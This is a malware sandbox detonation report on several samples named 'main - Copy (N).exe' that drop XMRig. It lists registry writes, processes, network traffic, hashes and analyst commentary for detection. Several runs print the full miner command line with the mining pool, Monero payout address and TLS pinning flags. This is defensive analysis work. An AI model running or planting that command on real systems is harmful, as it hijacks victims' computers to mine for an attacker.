memory/4956-22-0x0000023371C60000-0x0000023371C80000-memory.dmp

memory/4956-24-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-25-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-26-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-27-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-28-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-29-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-30-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-31-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-32-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-33-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-34-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-35-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-36-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-37-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-38-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-39-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-40-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-41-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-42-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-43-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-44-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-45-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-46-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-47-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-48-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-49-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-50-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-51-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-52-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-53-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-54-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-55-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-56-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-57-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-58-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-59-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-60-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-61-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-62-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-63-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-64-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-65-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-66-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-67-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-68-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-69-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-70-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-71-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-72-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-73-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-74-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-75-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-76-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-77-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-78-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-79-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-80-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-81-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

memory/4956-82-0x00007FF7341F0000-0x00007FF734CF3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:30

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1805s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
BE 2.17.107.98:443 www.bing.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 98.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2736-14-0x0000024BC7590000-0x0000024BC75B0000-memory.dmp

memory/2736-15-0x0000024BC75E0000-0x0000024BC7600000-memory.dmp

memory/2736-16-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-18-0x0000024BC7620000-0x0000024BC7640000-memory.dmp

memory/2736-17-0x0000024BC7600000-0x0000024BC7620000-memory.dmp

memory/2736-19-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-20-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-21-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-22-0x0000024BC7600000-0x0000024BC7620000-memory.dmp

memory/2736-23-0x0000024BC7620000-0x0000024BC7640000-memory.dmp

memory/2736-24-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-25-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-26-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-27-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-28-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-29-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-30-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-31-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-32-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-33-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-34-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-35-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-36-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-37-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-38-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-39-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-40-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-41-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-42-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-43-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-44-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-45-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-46-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-47-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-48-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-49-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-50-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-51-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-52-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-53-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-54-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-55-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-56-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-57-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-58-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-59-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-60-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-61-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-62-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-63-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-64-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-65-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-66-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-67-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-68-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-69-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-70-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-71-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-72-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-73-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-74-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-75-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-76-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-77-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-78-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-79-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-80-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-81-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

memory/2736-82-0x00007FF6DEB80000-0x00007FF6DF683000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:28

Platform

win10v2004-20240508-en

Max time kernel

1773s

Max time network

1786s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:34

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1792s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
BE 2.17.107.98:443 www.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 98.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1452-14-0x000001E88D620000-0x000001E88D640000-memory.dmp

memory/1452-15-0x000001E9212A0000-0x000001E9212C0000-memory.dmp

memory/1452-16-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-19-0x000001E9216E0000-0x000001E921700000-memory.dmp

memory/1452-18-0x000001E921920000-0x000001E921940000-memory.dmp

memory/1452-17-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-20-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-21-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-22-0x000001E921920000-0x000001E921940000-memory.dmp

memory/1452-23-0x000001E9216E0000-0x000001E921700000-memory.dmp

memory/1452-24-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-25-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-26-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-27-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-28-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-29-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-30-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-31-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-32-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-33-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-34-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-35-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-36-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-37-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-38-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-39-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-40-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-41-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-42-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-43-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-44-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-45-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-46-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-47-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-48-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-49-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-50-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-51-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-52-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-53-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-54-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-55-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-56-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-57-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-58-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-59-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-60-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-61-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-62-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-63-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-64-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-65-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-66-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-67-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-68-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-69-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-70-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-71-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-72-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-73-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-74-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-75-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-76-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-77-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-78-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-79-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-80-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-81-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

memory/1452-82-0x00007FF72DFE0000-0x00007FF72EAE3000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:40

Platform

win10v2004-20240226-en

Max time kernel

1800s

Max time network

1808s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan

Caveat: the key being written, AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349, is named after the SHA-1 thumbprint of the Comodo CA Limited "AAA Certificate Services" root (friendly name "Sectigo (AAA)", valid 2004-01-01 to 2028-12-31), a public trust anchor; the Blob is the CryptoAPI property-serialised form of that root and is shown in full under behavioral14. The same write occurs in every detonation here that ran the miner, alongside TLS connections to GitHub, which is consistent with Windows' automatic root update caching a root it needed for chain building rather than with the sample installing a private root, so the evasion/spyware/trojan tags on this signature should be weighed accordingly. A root the sample actually introduced would show up as a thumbprint that is not in the Microsoft trusted root list.
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Note: XMRig tries to enable SeLockMemoryPrivilege at start-up so it can back its RandomX dataset with large pages; the two entries below are the miner doing that, not a privilege-escalation step by the dropper. A user process enabling SeLockMemoryPrivilege is still a useful host signal for miners, since few desktop applications request it.

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Reading the flags: --url names the pool and port (pool.hashvault.pro, TCP/80); --user is the payout address, a 95-character Monero standard address beginning with 4 and the most durable indicator in this report, since the same address is used by every detonation that ran the miner; --pass T fills the pool password/worker field; --donate-level 1 sets the developer fee to its 1% minimum; --tls wraps the Stratum session in TLS despite the HTTP port, and --tls-fingerprint pins the pool certificate to the given SHA-256 fingerprint, so the miner will refuse an intercepting proxy's certificate. The relative path shows xmrig.exe was started with Temp as its working directory.

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3952 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4192 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8

Network

Reading the table: the sample's own traffic is the DNS lookup and TLS fetch from github.com / objects.githubusercontent.com (the dropped file below is xmrig-6.21.0\xmrig.exe, consistent with a release archive fetched from GitHub) and the Stratum-over-TLS session to pool.hashvault.pro on TCP/80. The in-addr.arpa rows are reverse lookups of the addresses contacted, and the chromewebstore.googleapis.com rows belong to the Edge utility processes listed above; neither is an indicator of the sample. Because the miner is started with --tls on port 80, a sensor that classifies port 80 as HTTP will see a TLS ClientHello there, not an HTTP request.

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 234.17.178.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
